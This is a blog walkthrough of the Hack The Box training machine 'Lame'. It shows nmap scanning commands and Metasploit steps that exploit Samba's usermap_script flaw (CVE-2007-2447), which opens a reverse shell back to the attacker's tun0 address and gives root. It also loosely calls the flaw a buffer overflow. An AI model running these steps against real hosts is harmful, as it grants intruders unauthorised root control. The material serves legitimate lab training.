tanades@home:~$

Archive

About

Lame


Lame is an easy Linux machine, requiring only one exploit to obtain root access. It was the first machine published on Hack The Box and was often the first machine for new users prior to its retirement.


Walkthrough

Reconnaissance

We will start by scanning protocolos in the target machine, this can be divided in 3 phases:

  1. Scan for open ports
  2. Scan for services in these open ports
  3. Scan for vulnerabilities in these services


Let’s start by scanning for open ports:

sudo nmap -sS -sU 10.10.10.3 -p- -T4 --min-rate 5000 -oG all_ports.txt --open -n -Pn

Ports Scan


There are 5 open ports:

  • 21/tcp
  • 22/tcp
  • 139/tcp
  • 445/tcp
  • 3632/tcp


Let’s check which services are running in these ports:

sudo nmap -sS 10.10.10.3 -p 21,22,139,445,3632 -T4 --min-rate 5000 -oX open_ports.xml -oN open_ports.txt --version-all -n -Pn -A -v

Services Scan


We can see that the services correspond to:

  • 21/tcp vsftpd 2.3.4
  • 22/tcp OpenSSH 4.7p1
  • 139/tcp Samba smbd 3.X - 4.X
  • 445/tcp Samba smbd 3.0.20
  • 3632/tcp distccd v1 4.2.4


Now we will seek for vulnerabilities, however the scan didn’t return any useful information.



Foothold

This machine was quite realistic for one reason, everything was vulnerable:

  • The version of FTP allowed an RCE, however it was patched.
  • The version of OpenSSH allowed user enumeration, and it allowed me to do so, however it didn’t return any useful information.
  • The version of Samba allowed a buffer overflow, and it allowed me to hack into the machine.
  • DistCC daemon should have allowed an RCE, however it was patched.


I tried every possible working exploit until I found the Samba one, which casually was the latest one. The exploit leverages CVE-2007-2447, although I found a script from the repository of un4gi, it did not work for me, however I encourage everyone to try it as the other tool we can use is Metasploit.


We can run Metasploit and configure it by running the following commands:

sudo msfdb run
use exploit/multi/samba/usermap_script
set lhost tun0
set rhost 10.10.10.3
run

Metasploit Configuration


We should be now logged in as the root user: Root Own


We can sanitize the shell and then print the flags:

script /dev/null -c /bin/bash

Flags